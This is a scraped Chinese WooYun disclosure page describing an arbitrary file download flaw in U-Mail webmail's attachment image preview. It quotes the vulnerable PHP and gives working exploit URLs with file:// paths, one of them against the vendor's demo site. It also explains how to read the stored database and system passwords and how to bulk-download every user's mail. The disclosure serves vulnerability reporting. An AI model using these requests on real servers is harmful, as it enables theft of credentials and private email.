U-Mail最新版任意文件下载漏洞 | wooyun-2014-085810| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085810

漏洞标题：U-Mail最新版任意文件下载漏洞

漏洞作者：香草

提交时间：2014-12-04 13:06

修复时间：2014-12-09 13:08

公开时间：2014-12-09 13:08

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-04：细节已通知厂商并且等待厂商处理中
1970-01-01：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
1970-02-25：细节向核心白帽子及相关领域专家公开
1970-03-07：细节向普通白帽子公开
1970-03-17：细节向实习白帽子公开
2014-12-09：细节向公众公开

简要描述：

下载了最新版的umail，发现漏洞还不少，不过上wooyun一搜索，都是以前大牛提交过了，只好另找一个了。任意文件下载，泄露系统重要敏感信息，还可导致可下载任意用户的全部邮件。u-mail的使用量就不说了，可以参考：
http://www.wooyun.org/bugs/wooyun-2010-061859

详细说明：

问题出现的位置是在图片预览的地方

http://192.168.1.24/webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url=1.gif&type=application/octet-stream

关键代码如下：

if ( ACTION == "attach-img-preview" )
{
    $download_url = $_GET['d_url'];
    $type = $_GET['type'];
    $data = get_url_data( $download_url );
    header( "Content-type: ".$type );
    header( "Expires: 0" );
    header( "Pragma: public" );
    echo $data;
    exit( );
}

zend解密出来的代码，凑合着看吧
继续跟进get_url_data,(admin/include/base_function.php)

function get_url_data( $_obfuscate_Il8i, $_obfuscate_5E5Av0svlQ = 1 )
{
    $_obfuscate_u_c = curl_init( );
    curl_setopt( $_obfuscate_u_c, CURLOPT_URL, $_obfuscate_Il8i );
    curl_setopt( $_obfuscate_u_c, CURLOPT_SSL_VERIFYPEER, FALSE );
    curl_setopt( $_obfuscate_u_c, CURLOPT_SSL_VERIFYHOST, FALSE );
    curl_setopt( $_obfuscate_u_c, CURLOPT_RETURNTRANSFER, TRUE );
    curl_setopt( $_obfuscate_u_c, CURLOPT_CONNECTTIMEOUT, $_obfuscate_5E5Av0svlQ );
    $_obfuscate_6RYLWQ = curl_exec( $_obfuscate_u_c );
    curl_close( $_obfuscate_u_c );
    return $_obfuscate_6RYLWQ;
}

url参数没有进行任何过滤，直接调用了c_url，因此我们可以访问如下url:

http://192.168.1.24//webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url=file://C:\windows\win.ini&type=text/htm

u-mail邮件系统在安装后会生成一些随机的密码作为数据库密码，已经新建两个系统用户，这些信息都存在umail下的readMe.txt,这个文件在web目录下是不能读取的

mysql root密码，系统用户账号密码都尽收眼底,而且建议用户不要修改……

更进一步我们可以做什么呢？
下载任意用户的任意邮件。
u-mail用户的邮件都会存在umail\Users\jc.com\test目录下
其中jc.com就是邮件服务器的域名，test是用户名，目录结构是：

其中md50000000001.msg，md50000000002.msg就是用户的邮件，是按照数字递增的。
因此我们可以很容易的写一个程序来遍历下载所有用户的所有邮件，邮件是eml格式的。

漏洞证明：

http://192.168.1.24//webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url=file://C:\windows\win.ini&type=text/htm

给个官网测试链接（需要点击试用，登上一个普通账号）：

http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url=file://C:\\windows\win.ini&type=text/htm

readMe.txt

修复方案：

过滤d_url参数

版权声明：转载请注明来源香草@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-12-09 13:08

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085810

漏洞标题：U-Mail最新版任意文件下载漏洞

相关厂商：U-Mail邮件服务系统

漏洞作者：香草

提交时间：2014-12-04 13:06

修复时间：2014-12-09 13:08

公开时间：2014-12-09 13:08

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源香草@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085810

漏洞标题：U-Mail最新版任意文件下载漏洞

相关厂商：U-Mail邮件服务系统

漏洞作者： 香草

提交时间：2014-12-04 13:06

修复时间：2014-12-09 13:08

公开时间：2014-12-09 13:08

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-085810"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 香草@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：香草

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源香草@乌云